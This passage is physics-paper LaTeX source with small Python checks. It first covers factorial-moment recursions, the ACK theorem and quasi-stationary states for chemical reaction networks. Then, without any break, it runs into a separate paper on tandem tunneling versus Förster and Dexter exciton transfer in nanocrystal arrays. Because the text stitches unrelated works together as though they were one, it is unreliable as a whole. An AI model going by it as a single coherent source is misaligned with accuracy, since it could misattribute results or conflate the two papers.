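    a[n, n + 1]  = n + 1      # a|n) = n|n-1)
    ad[n + 1, n] = 1.0        # a_dag|n) = |n+1)

def mp(mat, k):
    return np.linalg.matrix_power(mat, k)

k, y = 3, 4
lhs = mp(a, k) @ mp(ad, y)
# perm(y, j) is the falling factorial y^(underline j), zero for j > y.
rhs = sum(comb(k, j) * perm(y, j) * mp(ad, y - j) @ mp(a, k - j)
          for j in range(k + 1))

M = N - y - k   # block safely away from the truncation boundary
print(np.allclose(lhs[:M, :M], rhs[:M, :M]))
```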
The equation for the time-dependence of ${\rm n}_p^{\underline {k_p}}$
may hence be compactly written as
\begin{align}
\frac{\partial}{\partial \tau}
\left<
{\rm n}_p^{\underline {k_p}}
\right>
& =
\sum_{j = 0}^{k_p}
\left(
\begin{array}{c}
k_p \\ j
\end{array}
\right)
{
\left( Y_p \right)
}^{\underline j} {\cal A}
E\left[ a_p^{k_p-j} {\psi}_{Y} \! \left( a \right)\right]
\label{eq:fac_mom1}
\end{align}
Note that in Eq. (\ref{eq:fac_mom1}), the $j=0$ term does not contribute, since it multiplies $\cal{A}$
by a row vector of $1$'s, which is a zero left eigenvector.
Hence for $k_p=1$, only the $j=1$ term contributes. This
gives $\left( Y_{p} \right)^{\underline 1} = Y_p $, resulting
in the RHS of Eq. (\ref{eq:CRN_std_rate_eqn}).
Eq.(\ref{eq:fac_mom1}) may also be easily generalized in order to calculate mixed moments as in Eq. (\ref{eq:Phi_def}). For this
we need to consider the action of the lowering operators
$\prod_p a_p^{k_p}$ (as in Eq. \ref{eq:fac_mom}) which, by their action on
$\left| \phi \right) $
result in mixed moments $\left< \prod_p {{\rm n}}_p^{\underline{k_p}} \right>$.
By considering the generalisation of Eq. (\ref{eq:comm_rules}),
the equation for the time derivative of such a mixed moment is seen to be,
\begin{align}
\frac{\partial}{\partial \tau}
\left<
\prod_p
{{\rm n}}_p^{\underline{k_p}}
\right>
& =
\sum_{j_1 = 0}^{k_1}
\left(
\begin{array}{c}
k_1 \\ j_1
\end{array}
\right) \ldots
\sum_{j_P = 0}^{k_P}
\left(
\begin{array}{c}
k_P \\ j_P
\end{array}
\right)
\left[
\dot{\prod_p}
Y_p^{\underline{j_p}} \,
\right]
{\cal A}
E \left[
{\psi}_{Y + \left( k - j \right)} \! \left( a \right)
\right]
\nonumber \\
\label{eq:Glauber_moment_fact_prod}
\end{align}
The notation ${\dot{\prod}}_p$ denotes a product over species $p$
within each index $i$ of the row vectors $Y_p^{\underline{j_p}}$.
Note that in the sums over $j_p$, we must now retain the $j_p = 0$
entries, because even if one index $Y_p^{\underline{j_p}} = {\left[ 1
\right]}^T$, there may be others in the sum where $j_{p^{\prime}} \neq
0$, and the product $\left( {\dot{\prod}}_p Y_p^{\underline{j_p}}
\right) {\cal A} $ is only assured to vanish when all $j_p = 0$.
The term $ E \left[ {\psi}_{Y + \left( k - j \right)} \! \left( a \right)\right]$
is shorthand for
$ E\left[\prod_p a_p^{k_p-j_p} {\psi}_{Y} \! \left( a \right)\right]$.
Note that though Eq. (\ref{eq:fac_mom1}) and Eq. (\ref{eq:Glauber_moment_fact_prod}) may be derived directly
from the master equation (without going through the Doi algebra),
the simplification that comes from noting the relation of
the coefficients to the matrices $Y$ and ${\cal A}$
is only possible within the formalism we introduce here.
This in turn helps in writing recursion relations that solve
the entire moment hierarchy, as we demonstrate
in Section II G.
\subsection{A one-line proof of the ACK theorem}
We explain how the ACK theorem follows very simply from
the considerations above. Without loss of generality we
limit this discussion to Eq. (\ref{eq:fac_mom1}), for
ease of presentation.
From the considerations in Section II D,
Eq. (\ref{eq:fac_mom1}) may be re-written as,
\begin{align}
\frac{\partial}{\partial \tau}
\left<
{\rm n}_p^{\underline k_p}
\right>
& =
\sum_{j = 0}^{k_p}
\left(
\begin{array}{c}
k_p \\ j
\end{array}
\right)
{
\left( Y_p \right)
}^{\underline j} {\mathcal{A}}
\left\{
\sum_{i = 1}^s
e_i e_i^T +
\sum_{j = 1}^{\delta}
{\tilde{e}}_j {\tilde{e}}_j^T
\right\}
\nonumber \\
& \mbox{}
\times E \left[ a_p^{k_p-j} {\psi}_{Y} \! \left( a \right) \right]
\label{eq:fac_mom3}
\end{align}
In particular, the equation for the first moment,
Eq. (\ref{eq:CRN_std_rate_eqn}), can be written as
\begin{align}
\frac{\partial}{\partial \tau}
\left<
{{\rm n}_p}
\right>
& =
{
Y_p {\cal A}
\sum_{i = 1}^s
e_i e_i^T
E \left[ {\psi}_{Y} \! \left(a\right) \right]}
\label{eq:fac_mom4}
\end{align}
where we have used the fact that all other basis
vectors are projected to zero by $Y_p {\cal A}$.
Hence for $\delta=0$ networks with mass-action
rates,
the entire hierarchy of moments, Eq. (\ref{eq:fac_mom3}) for any value of $k_p$,
is satisfied
if
\begin{equation}
e_i^T E \left[\left[{\psi}_{Y} \! \left( a \right)\right]\right] =0
\label{eq:projectors_cond}
\end{equation}
for every $i=1,\cdots, s$. The notation $E\left[\left[ \,\,
\right]\right]$ now denotes
an average over a specific distribution: a Poisson distribution.
Note that for a Poisson distribution,
an equation for the first moment is the same as a {\it rate equation}
(since $\langle {\rm n}^{\underline k} \rangle = \langle {\rm n} \rangle ^k$).
Hence, for $\delta =0$ networks,
the condition that the rate equation has a unique solution
also guarantees that the entire moment hierarchy is solved,
from which the ACK theorem follows \cite{Anderson:product_dist:10}.
\subsection{Steady-state Recursions}
For CRN's for which $\delta \neq 0$, there is no general way
to satisfy the full moment-hierarchy
of Eq. (\ref{eq:Glauber_moment_fact_prod}) by demanding that any combination of
$e$ and $\tilde{e}$ vanish.
Note though that the sums $\sum_j$ in Eq. (\ref{eq:Glauber_moment_fact_prod})
only extend from $j=0$ to $j=j_{\rm max}$, with
the latter determined by when the row
$Y_p^{\underline{j_{\rm max}}}$ vanishes. For the CRN in
Fig. \ref{fig:g_123_conn}, $j_{\rm max} =4$,
while for the CRN in Fig. \ref{fig:two_species_bistable}, there are two sums over $j$
in Eq. (\ref{eq:Glauber_moment_fact_prod}), both with $j_{\rm max} =3$.
This helps us write Eq. (\ref{eq:fac_mom1}) (or Eq. (\ref{eq:Glauber_moment_fact_prod}) in the general case) as a recursion relation
for the ratios of FM's in the steady state.
We demonstrate this for the two examples introduced above. For the CRN of Fig. \ref{fig:g_123_conn}
if we define $ R_k \equiv \frac{\left<{{\rm n}}^{\underline k}\right>}{\left<{{\rm n}}^{\underline {k-1}}\right>} $\footnote{For one species, $k=k_p$.},
then Eq. (\ref{eq:fac_mom1}) may be rewritten {\it exactly} as the
following recursion relation for $k>1$\footnote{The moment recursions for this CRN leave $k=1$ undetermined. However, this does {\em not} mean that $R_1$ is free to take any value. Moments of a probability distribution satisfy inequalities \cite{vanKampen:Stoch_Proc:07} such as the elementary relation $R_2 \geq (R_1-1)$. These presumably constrain the first moment to its actual value.},
\begin{equation}
R_k= \frac{(k-1)\left(\frac{\alpha}{\beta}+ \frac{\epsilon}{\beta}(k-2)\right)} {(k-1) \left(2 R_{k+1} + (k-2) -\frac{\epsilon}{\beta}\right) + R_{k+2}R_{k+1} - \frac{\alpha}{\beta} }
\label{eq:rec_123}
\end{equation}
We have written the recursion for $R_k$ for descending $k$ because,
while we do not know the value of $R_k$ for
small $k$, we do know it for large $k$, where $R_k \sim \epsilon/\beta$
(as evident from Eq. \ref{eq:rec_123}).
If we begin from this `asymptotic' value
at arbitrarily large $k$, we have a procedure to
obtain the value of $R_k$ all the way down to $k=2$, for any choice of
parameters \footnote{We often want to obtain the actual moments
and not just their ratios. Note that this is possible
since $R_1 \equiv \left<n\right>$. Hence, $\langle n^{\underline{2}} \rangle = R_2R_1$; $\langle n^{\underline{3}} \rangle = R_3R_2R_1$ {\em etc}.}
The result is shown in Fig. \ref{fig:rec_123_comp}. Eq. (\ref{eq:rec_123}) being
\textit{exact}, the results of the recursions and the Monte-Carlo simulations
agree to arbitrary accuracy, limited only by the amount of averaging done in the simulations (and we expect this to be the case for
any set of parameters)\footnote{The downward recursion Eq. (\ref{eq:rec_123})
may, however, fail to converge for $k$-values much smaller than $\left<n\right>$ when the parameters make the latter large. In this case,
an \textit{upward} recursion, expressing larger $k$ in terms of smaller $k$, can be written, and both
upward and downward recursions solved simultaneously. In \cite{Smith:LP_CRN:17}, we elaborate on this further.}.
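For concreteness, the downward sweep takes only a few lines to implement. The sketch below is ours; the seed order $K$ and the function name are arbitrary choices:

```python
def fm_ratios(alpha, beta, eps, K=400):
    """Solve the recursion Eq. (rec_123) downward, seeding with the
    asymptotic value R_K = R_{K+1} = eps/beta.

    Returns {k: R_k} where R_k = <n^(k underline)> / <n^((k-1) underline)>.
    """
    a, e = alpha / beta, eps / beta
    R = {K: e, K + 1: e}                 # asymptotic seed, R_k -> eps/beta
    for k in range(K - 1, 1, -1):        # k = K-1 down to 2
        num = (k - 1) * (a + e * (k - 2))
        den = (k - 1) * (2 * R[k + 1] + (k - 2) - e) + R[k + 2] * R[k + 1] - a
        R[k] = num / den
    return R

# Parameters of Fig. (rec_123_comp): alpha = 100, beta = 10, eps = 70.
R = fm_ratios(alpha=100.0, beta=10.0, eps=70.0)
```

Perturbations of the seed are strongly damped during the downward sweep at large $k$, so the values obtained at small $k$ are insensitive to the choice of $K$ once it is moderately large.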
\begin{figure}
\begin{center}
\includegraphics[scale=0.2,angle=270]{rec_123_comp.eps}
\caption{Numerical evaluation of the recursions of Eq. \ref{eq:rec_123} (line) compared to values from Monte-Carlo simulations (symbols) for $\alpha=100$, $\beta=10$ and $\epsilon =70$. For large $k$, $R_k$ saturates to $\epsilon/\beta = 7$ as explained in the text.
\label{fig:rec_123_comp}
}
\end{center}
\end{figure}
The one-species case we have considered is an example of a birth-death process
\cite{vanKampen:Stoch_Proc:07} for which many results are known, including the steady state. The recursions of Eq. (\ref{eq:rec_123}), however, give us a particularly
easy way, albeit numerical, to obtain this steady state.
In addition, while there exists no general formalism to obtain the steady state for CRN's which are {\em not} birth-death processes, the above procedure is, in principle, applicable to any CRN, such as the two-species CRN of Fig. \ref{fig:two_species_bistable}, as we show below.
The moment hierarchy for the two-species case
consists of mixed moments such as
$ \langle {\rm n}_a^{\underline k}{\rm n}_b^{\underline k^{\prime}} \rangle$.
This CRN has no conservation
law, so solving the full moment hierarchy is equivalent to solving for the full probability distribution $P\! \left({\rm n}_a,{\rm n}_b \right)$ which is, in addition, {\em not} factorized. In analogy with the one-species case,
we can write a coupled
set of recursions for the quantities $T_k \equiv \frac{ \langle {\rm n}_a^{\underline k}{\rm n}_b^{\underline k} \rangle}{\langle {\rm n}_a^{\underline{k-1}}{\rm n}_b^{\underline{k-1}}\rangle}$ and $S_k \equiv \frac{\langle {\rm n}_a^{\underline k}{\rm n}_b^{\underline{k-1}}\rangle }{\langle {\rm n}_a^{\underline{k-1}}{\rm n}_b^{\underline{k-1}}\rangle}$. For large $k$, the equations for the FM predict that $T_k \sim \left(k_1/{\bar k}_1\right)^2$ and $S_k \sim \left(k_1/{\bar k}_1\right) $.
Using the symmetries of this CRN (in the exchangeability of the
species $\rm A$ and $\rm B$; hence $\langle {\rm n}_a^{\underline k}{\rm n}_b^{\underline k^{\prime}} \rangle = \langle {\rm n}_a^{\underline k^{\prime}}{\rm n}_b^{\underline k} \rangle$), and approximating $\frac{\langle {\rm n}_a^{\underline {k-2}}{\rm n}_b^{\underline{k}}\rangle }{\langle {\rm n}_a^{\underline{k-1}}{\rm n}_b^{\underline{k-1}}\rangle} \sim 1$\footnote{We have verified this numerically. A
theoretical justification comes from looking at the analytic form of the FM in the large-$k,k^{\prime}$ limit \cite{Smith:LP_CRN:17}. We can show that to leading order the FM are only functions of $k+k^{\prime}$ thus validating this approximation.},
we obtain two coupled recursions,
\begin{align}
T_k &= \frac{2\epsilon k -\epsilon + k k_1(k-1)(2k-3)}{S_{k+1}C + T_{k+1}D + E} \nonumber \\
S_k &= T_k\left({S_{k+1}C_1 + T_{k+1}D_1 + E_1} \right)
\label{eq:rec_two_species}
\end{align}
where $C$, $D$ {\em etc} are functions of $k$ as well as the rate constants
$k_1$, ${\bar{k}_1}$ {\em etc} in the problem. Again, for large $k$, it is easy to see from the recursions (after putting in the expressions for $C$, $D$ {\em etc}), that $T_k \sim \left( \frac{k_1}{\bar{k}_1} \right)^2$ and $S_k \sim \frac{k_1}{\bar{k}_1}$ as required by the equations for the FM. Beginning from this value at some
arbitrarily large value of $k$, we can predict values for $T_k$ all the
way down to $k=2$ as shown in Fig. \ref{fig:rec_two_species}.
\begin{figure}
\begin{center}
\includegraphics[scale=0.2,angle=270]{new_para_1.eps}
\caption{Numerical evaluation of the recursions of Eq. \ref{eq:rec_two_species} (line) compared to values from Monte-Carlo simulations (symbols) for $k_1=14$, $\bar{k}_1=1$, $\epsilon =36$ and $k_2=49$. For large $k$, $T_k$ saturates to $\left(k_1/{\bar k}_1\right)^2 = 196$. {The values obtained from the recursions and simulations agree up to the first decimal place for any $k$.}
\label{fig:rec_two_species}
}
\end{center}
\end{figure}
Note that $R_k$ saturating to a constant value independent of $k$ in the one-species case is as if the large-$k$ moments obey a Poisson distribution
with parameter $ \epsilon/\beta$ \footnote{$R_k$ could also be a constant
if the distribution were a delta function around $\epsilon/\beta$.
This, however, cannot happen when fluctuations in the number are possible.}.
Similarly $T_k$ and $S_k$ saturating to constant values is equivalent to
the large-$k$ behaviour of the two-species system being describable
by a factorized Poisson distribution with parameter $\left(k_1/{\bar k}_1\right)$. From the form of Eq. (\ref{eq:fac_mom1}) in the steady state,
it is evident that, even with an arbitrary number of species,
there will always be a limited number of terms which will dominate
for large moments. Demanding that these terms vanish will hence always lead
to a factorized Poisson distribution which will approximately (up to corrections
of order $1/k$) solve the moment hierarchy.
At the other end, $k=1$, the equation for the
first moment can also be solved by postulating a factorized Poisson distribution
with the parameter of the Poisson determined by the rate equation of the problem.
These two Poisson distributions have different parameters and are both,
for a $\delta \neq 0$ network, only approximations to the true distribution.
Nevertheless, they are helpful in implementing a systematic
approximation procedure to solve the moment hierarchy as we elaborate in a
following paper \cite{Smith:LP_CRN:17}.
\subsection{Quasi Steady States}
The CRN's we have considered so far have been {\em reversible}
in the sense that every reaction is accompanied by its reverse.
We now consider a CRN which is neither reversible nor even weakly reversible:
\begin{align}
& {\rm B} \xrightarrow {\beta} {\rm A} \nonumber \\
& {\rm B} + {\rm A}
\xrightarrow {\alpha} {2 \rm B} .
\label{eq:quasist}
\end{align}
This CRN has been considered in \cite{Anderson:ACR:14} in the context of
understanding properties of the quasi-stationary distribution. The
true steady state of this model is an absorbing state with ${\rm n}_b=0$.
However, when ${\rm n}_a+ {\rm n}_b =\rm M$ and $\rm M$ is large, the
system can take a very long time to reach this absorbing state,
and instead reaches a quasi-stationary distribution.
All properties of the quasi-stationary distribution are easily
derivable for this model \cite {Anderson:ACR:14} and it
is seen that as $\rm M \rightarrow \infty$, this
distribution is a Poisson with parameter
$\beta/\alpha$ \cite {Anderson:ACR:14}.
The equations for the FM give this result very easily as well.
If we define $ X_k \equiv \frac{\left<{{\rm n}_a}^{\underline k}{{\rm n}_b}^{\underline {k^{\prime}-1}}\right>}{\left<{{\rm n}_a}^{\underline {k-1}} {{\rm n}_b}^{\underline {k^{\prime}-1}}\right>}$, then it is easily seen that the CRN of Eq. (\ref{eq:quasist}) leads to the
recursions
\begin{equation}
X_k = \frac{k\beta {\rm M}^2}{k\alpha {\rm M}^2 + A + X_{k+1}B + X_{k+1}X_{k+2} \alpha (k+k^{\prime})}
\end{equation}
$A$ and $B$ are linear in $\rm M$, and hence for large $\rm M$ and $k^{\prime}=1$, $X_k \sim \frac{\beta}{\alpha}$ for any $k$, as expected for the ratios of the
FM of a Poisson distribution \footnote{Note that $X_k=\rm M$ is also a solution for $k^{\prime}=1$. This is the absorbing state.}.
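This is easy to confirm with a direct stochastic simulation of the network (\ref{eq:quasist}). The Gillespie-type sketch below is our own check, with arbitrary illustrative rate values; it time-averages ${\rm n}_a$ in the quasi-stationary regime:

```python
import random

def mean_na_quasistationary(alpha, beta, M, steps=200_000, seed=1):
    """Gillespie simulation of B -> A (propensity beta*n_b) and
    A + B -> 2B (propensity alpha*n_a*n_b); n_a + n_b = M is conserved.
    Returns the time-averaged n_a."""
    rng = random.Random(seed)
    na, nb = 0, M
    t_tot, na_time = 0.0, 0.0
    for _ in range(steps):
        w1 = beta * nb            # B -> A
        w2 = alpha * na * nb      # A + B -> 2B
        w = w1 + w2
        if w == 0.0:              # absorbing state n_b = 0; not reached for large M
            break
        dt = rng.expovariate(w)
        na_time += na * dt
        t_tot += dt
        if rng.random() * w < w1:
            na += 1; nb -= 1
        else:
            na -= 1; nb += 1
    return na_time / t_tot

# For beta/alpha = 5 and M = 100 the quasi-stationary mean of n_a stays
# close to beta/alpha, consistent with a near-Poisson quasi-stationary state.
mean_na = mean_na_quasistationary(alpha=1.0, beta=5.0, M=100)
```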
\section{Conclusion}
To conclude, the structure of the equations for the FM
helps us write them as recursions for ratios of FM, which
can then be solved numerically,
beginning from an asymptotic estimate (predicted by the equations themselves).
The equations for the FM (Eq. \ref{eq:fac_mom1} or Eq. \ref{eq:Glauber_moment_fact_prod}) are exact and, for any given CRN, easy to write down.
In this paper, we have illustrated this procedure for two
toy models. However, there are several physically
relevant model-CRN's in the biochemistry, systems-biology, ecology
and epidemiology contexts,
to which we expect to be able to apply our methods.
It should be noted, however, that
except in the case of very few species or very simple stoichiometry,
the recursions obtained from these equations can become
complicated to solve. It would hence be very useful if this
procedure could be systematized in some way independent
of the particular CRN under study, perhaps
with the help of some of the techniques available
in the large body of work that exists on efficient
ways to truncate the moment hierarchy in CRN's \cite{Schnoerr:Survey:15}.
In \cite{Smith:LP_CRN:17}, we have provided alternate
approximation schemes (differing from moment-closure schemes)
for the FM equations, related to asymptotic expansions in the
low-$k$ and large-$k$ limit. These methods
might be applicable, even in the case when recursions like
Eq. (\ref{eq:rec_123}) and Eq. (\ref{eq:rec_two_species}) are hard
to obtain for CRN's with many species.
CRN's with non-mass-action kinetics
could also be interesting to look at \cite{Anderson:non_mass_action:16}.
Finally, though we have only concentrated on the
static properties here, the Liouvillian contains all
information on the dynamics as well, which can be investigated further,
in the spirit of \cite{Polettini:diss_def:15}.
{\it Acknowledgements}: SK would like to thank Artur Wachtel
for very useful discussions during the Nordita
program `Stochastic thermodynamics in biology' (2015). DES thanks
Nathaniel Virgo for discussions and the Stockholm University Physics Department for hospitality
while this work was being carried out. DES acknowledges support from NASA Astrobiology Institute Cycle 7 Cooperative Agreement Notice (CAN-7) award:
Reliving the History of Life: Experimental Evolution of Major Transitions.
Let us first formulate our results.
We show that in an epitaxially connected array of NCs, the ratio of the tandem tunneling rate $\tau_{T}^{-1}$ to the F{\"o}rster rate $\tau_{F}^{-1}$ is
\begin{equation}
\label{eq:the_answer_foster}
\frac{\tau_{T}^{-1}}{\tau_{F}^{-1}} = \left(8.7 \frac{a_{B}}{a_{0}}\right)^{4} \left(\frac{\kappa_{NC}+2\kappa}{\kappa_{NC}} \right)^{4} \left(\frac{\rho}{d}\right)^{12}.
\end{equation}
Here $a_{B} = 4\pi \hbar^{2} \varepsilon_{0} \kappa_{NC}/\sqrt{m_{e}m_{h}} e^{2}$ is the unconventional effective exciton Bohr radius, $e a_{0}$ is the dipole moment matrix element taken between the valence- and conduction-band states and $\kappa_{NC}$ is the high frequency dielectric constant of the material.
In Table 1 we summarize our estimates of the ratio (\ref{eq:the_answer_foster}) for different NCs. We used $d = 6~\mathrm{nm}$ and $\rho= 0.2 d \simeq 1 ~\mathrm{nm}$. Values of $\kappa_{NC}$ are taken from Ref. \cite{978-3-642-62332-5}. For epitaxially connected NCs we use $\kappa=2\kappa_{NC}\rho/d$ (see Ref. \cite{dielectric_constant_touching_NC}).
The ratio (\ref{eq:the_answer_foster}) is derived for materials with isotropic single-band hole ($m_{h}$) and electron ($m_{e}$) masses. For most materials the spectra are more complex. Below we explain how we average the masses for these materials and also how we calculate $a_{0}$.
We see that the tandem tunneling can be comparable with the F{\"o}rster mechanism in semiconductors such as InP and CdSe, where the effective mass is small.
The tandem tunneling can be more efficient in cases where the F{\"o}rster mechanism is forbidden.
For example, in indirect band gap semiconductors like Si, where $a_{0}$ is small and the F{\"o}rster mechanism is not effective, the tandem tunneling mechanism dominates.
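To make Eq. (\ref{eq:the_answer_foster}) concrete, the sketch below evaluates it numerically. The material parameters here ($\kappa_{NC}$, the masses, $E_g$) are illustrative CdSe-like textbook values of ours and are not necessarily those behind Table 1:

```python
import math

HBAR = 1.0545718e-34    # J s
EPS0 = 8.8541878e-12    # F/m
E_CH = 1.6021766e-19    # C (also J per eV)
M0   = 9.1093837e-31    # kg, free-electron mass

def exciton_bohr_radius(kappa_nc, me_rel, mh_rel):
    # a_B = 4 pi hbar^2 eps0 kappa_NC / (sqrt(m_e m_h) e^2)
    mu = math.sqrt(me_rel * mh_rel) * M0
    return 4 * math.pi * HBAR**2 * EPS0 * kappa_nc / (mu * E_CH**2)

def dipole_a0(Eg_eV, me_rel):
    # Eq. (a0): a_0^2 = (3/4) hbar^2 / (E_g m_e)
    return math.sqrt(0.75 * HBAR**2 / (Eg_eV * E_CH * me_rel * M0))

def tandem_over_forster(kappa_nc, me_rel, mh_rel, Eg_eV, rho, d):
    kappa = 2 * kappa_nc * rho / d        # dielectric constant of the array
    a_B = exciton_bohr_radius(kappa_nc, me_rel, mh_rel)
    a_0 = dipole_a0(Eg_eV, me_rel)
    return (8.7 * a_B / a_0) ** 4 * ((kappa_nc + 2 * kappa) / kappa_nc) ** 4 \
        * (rho / d) ** 12

# Illustrative CdSe-like inputs with d = 6 nm and rho = 0.2 d:
ratio = tandem_over_forster(kappa_nc=6.2, me_rel=0.13, mh_rel=0.45,
                            Eg_eV=1.74, rho=1.2e-9, d=6e-9)
```

The twelfth power of $\rho/d$ makes the result extremely sensitive to the neck radius, so modest changes in $\rho$ shift the ratio by orders of magnitude.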
The tandem tunneling also dominates at low temperatures. Excitons can be in bright or dark spin states \cite{Efros_dark_exciton}. Only the bright exciton can hop via the F{\"o}rster mechanism. The dark exciton has smaller energy, and the dark-bright exciton splitting is of the order of a few meV. Thus at low temperatures an exciton is in the dark state and cannot hop by the F{\"o}rster mechanism. At the same time, the tandem tunneling is not affected by the spin state of the exciton.
Dexter \cite{Dexter_transfer} suggested another exciton transfer mechanism which is also not affected by the spin state of the exciton: two electrons of the two NCs exchange with each other (see Fig. \ref{fig:Scheme}c). We show below that for an array of NCs the ratio between the rates of the tandem tunneling and the Dexter mechanism is:
\begin{equation}
\label{eq:the_answer}
\frac{\tau_{T}^{-1}}{\tau_{D}^{-1}} = \left(\frac{\Delta_{e}\Delta_{h}}{4E_{c}^{2}}\right)^{2}.
\end{equation}
In most cases $\Delta_{e,h} \gg E_{c}$, and one can see from Table 1 that the tandem tunneling rate is much larger than the Dexter rate, with the exception of ZnO.
It is worth noting that the same ratio holds not only for epitaxially connected NCs but also for NCs separated by ligands.
Of course, if NCs are separated by ligands, say by a distance $s$, and wave functions decay in the ligands as $\exp(-s/b)$, where $b$ is the decay length of an electron outside of a NC, both rates acquire an additional factor $\exp(-4s/b)$.
Also, the difference between the tandem mechanism and Dexter transfer emerges only in NCs, where $\Delta_{e,h} \gg E_{c}$.
In atoms and molecules, where essentially $E_{c} \simeq \Delta$, there is no such difference between the two mechanisms.
For epitaxially connected Si and InP NCs, where the tandem tunneling is substantial, these predictions can be verified in the following way.
One can transform the bright exciton into the dark one by varying magnetic field or temperature.
The exciton in the dark state cannot hop by the F{\"o}rster mechanism, and usually hops much more slowly \cite{energy_transport_NC_Rodina,Exciton_CdSe_H_T}.
For epitaxially connected NCs, where the tandem rate is larger than the F{\"o}rster one, the exciton transfer should not be affected by magnetic field or temperature.
Let us now turn to the derivation of the main result. For that we first discuss electron wave functions in epitaxially connected NCs.
\emph{Wave functions of two epitaxially connected NCs.} Below we describe the envelope wave functions in two epitaxially connected NCs. Here we present only scaling estimates and calculate numerical coefficients in the methods section. The wave functions for electrons and holes are the same, so we concentrate only on the electron.
In an isolated NC the electron wave function is:
\begin{equation}
\label{eq:psi_0}
\psi_{0}(r) = \frac{1}{\sqrt{\pi d} r} \sin \left(2\pi \frac{r}{d}\right),
\end{equation}
where $r$ is the distance from the center of the NC. We focus on two NCs shown on Fig \ref{fig:Scheme}, which touch each other by the small facet in the plane $z=0$. In this situation the wave function for an electron in the left NC $\Psi^{L}$ leaks through this small facet, so that it is finite in the plane of the facet $z=0$ and in the right NC. The derivative $\partial \Psi^{L}/\partial r$ is hardly changed by this small perturbation, so that the wave function in the plane $z=0$ acquires a finite value:
\begin{equation}
\label{eq:4}
\Psi^{L}(z=0) \simeq \rho \frac{\partial \psi_{0}}{\partial z} \simeq \frac{\rho}{d^{5/2}}.
\end{equation}
The same happens with the wave function of an electron in the right NC, $\Psi^{R}$. $\Psi^{L}$ and $\Psi^{R}$ are symmetric with respect to the plane $z=0$.
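As a quick numerical sanity check (ours, not part of the derivation), the prefactor in Eq. (\ref{eq:psi_0}) indeed normalizes $\psi_0$ over a sphere of diameter $d$:

```python
import math

def norm_psi0(d, n=20000):
    """Midpoint-rule integral of |psi_0|^2 * 4 pi r^2 over 0 <= r <= d/2,
    with psi_0 = sin(2 pi r / d) / (sqrt(pi d) r)."""
    h = (d / 2) / n
    total = 0.0
    for i in range(n):
        r = (i + 0.5) * h
        psi = math.sin(2 * math.pi * r / d) / (math.sqrt(math.pi * d) * r)
        total += psi * psi * 4 * math.pi * r * r * h
    return total

assert abs(norm_psi0(6e-9) - 1.0) < 1e-6   # unit normalization for any d
```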
\emph{Tunneling matrix element.} We calculate the matrix element (\ref{eq:M_T}) of an electron and hole tunneling through the contact facet in the second order perturbation theory.
$E_c$ is the energy of the intermediate state, in which the electron moves to the right NC, while the hole is still in the left NC.
In other words the left NC plays the role of donor (D) and the right one the role of acceptor (A) so that intermediate state is $D^{+}A^{-}$ state.
For touching NCs the energy of $D^{+}A^{-}$ state is evaluated in the methods section and is shown to be $\xi E_{c}$, where $|\xi-1| < 0.1$.
Therefore in Eq. (\ref{eq:M_T}) and throughout the paper we use $\xi=1$.
In Eq. (\ref{eq:M_T}) the factor $2$ accounts for the two possible orders of the electron and hole hops.
Matrix elements $t_e,t_h$ for the electron and hole single particle tunneling from one NC to another can be written as \cite{landau_quantum} (see the methods section)
\begin{equation}
\label{eq:t}
t_{e,h}=\frac{\hbar^2}{m_{e,h}} \int \Psi^{L*} (r_1) \frac{\partial}{\partial z} \Psi^{L} (r_1) dS,
\end{equation}
where the integration is over the plane $z=0$.
Using Eqs. (\ref{eq:psi_0}) and (\ref{eq:4}) we arrive at Eq. (\ref{eq:t_2}).
Substituting (\ref{eq:t_2}) into Eq. (\ref{eq:M_T}) we get
\begin{equation}
\label{eq:our_Dexter}
M_{T}= C_{T} \frac{\Delta_{e}\Delta_{h}}{E_{c}}\left(\frac{\rho}{d}\right)^{6},
\end{equation}
where the numerical coefficient $C_{T}=2^{7}/9\pi^{2} \simeq 1.4$ is calculated in the methods section.
Above we assumed that the energy spectra of electrons and holes are isotropic and have one band. In fact, in most cases the hole energy spectrum has heavy and light band branches with masses $m_{hh}$ and $m_{hl}$ respectively. The energy of the lower state $\Delta_{h}$ can be determined with adequate accuracy if instead of a complicated valence band structure we consider a simple band~\cite{Yassievich_excitons_Si,Holes_electrons_NCs} in which the holes have an average mass $m_{h}=3m_{hl}m_{hh}/(m_{hl}+2 m_{hh})$. For indirect band materials like Si an electron in the conduction band has an anisotropic mass in the transverse $m_{et}$ and parallel $m_{ep}$ directions. The effective mass $m_{e}$, which determines the energy of the lower state $\Delta_{e}$, has a similar form $m_{e}=3m_{et}m_{ep}/(m_{et}+2 m_{ep})$. Using data for the electron and hole masses from Ref. \cite{978-3-642-62332-5} we get the values of $\sqrt{m_{e}m_{h}}$ shown in Table 1.
\emph{F{\"o}rster matrix element.} Now we dwell on the F{\"o}rster matrix element. It is known \cite{Delerue_Foster_NC} that the matrix element for the F{\"o}rster transfer between two touching NCs is
\begin{align}
\label{eq:M_F}
M_F & = \sqrt{\frac{2}{3}} \frac{e^{2}}{4\pi \varepsilon_{0} d^{3}} \eta a_{0}^{2}.
\end{align}
Here we assume that dipoles which interact with each other are concentrated in the center of NCs. The factor $\eta=9\kappa/(\kappa_{NC}+2\kappa)^{2}$ takes into account that the dipole-dipole interaction is screened \cite{Forster_Rodina}. The product $e a_{0}$ is the matrix element of the dipole moment between the conduction and valence band. Eqs. (\ref{eq:our_Dexter}) and (\ref{eq:M_F}) bring us to the ratio (\ref{eq:the_answer_foster}).
In order to find $a_{0}$ we note that the matrix element of the dipole moment is related to the band gap $E_{g}$ of the material and the momentum matrix element $p$ as~\cite{laser_devices_Blood}
$$a_{0}^{2} = \frac{\hbar^{4}p^{2}}{m^{2}E_{g}^{2}}.$$
According to the Kane model $p$ determines the effective electron mass \cite{Efros_review_NCs}, so we can say that
\begin{equation}
\label{eq:a0}
a_{0}^{2}=\frac{3}{4} \frac{\hbar^{2}}{E_{g}m_{e}}.
\end{equation}
Estimates of $a_{0}$ for direct gap materials are given in Table 1.
For an indirect band gap semiconductor such as Si the dipole-dipole transition is forbidden. However, in small NCs this transition is possible due to the confinement or phonon assistance. One can estimate the effective $a_{0}$ in the following way. The transfer rate for InAs is $10^{7}$ times larger than for Si \cite{Delerue_Foster_NC}; because their dielectric constants are close, we assume that the difference in rates is due to $a_{0}$. Thus for Si the effective $a_{0}$ is $55$ times smaller than for InAs, which we obtain with the help of Eq. (\ref{eq:a0}).
\emph{Dexter matrix element.} The physics of the Dexter transfer mechanism\cite{Dexter_transfer} involves electron tunneling, but differs from that of the tandem tunneling mechanism in the following sense.
The Dexter matrix element $M_{D}$ is calculated below in the first order of perturbation theory in the electron-electron interaction between two-electron wave functions.
